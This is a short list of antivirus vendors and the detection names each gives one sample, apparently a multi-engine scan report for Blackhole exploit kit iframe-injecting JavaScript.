- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|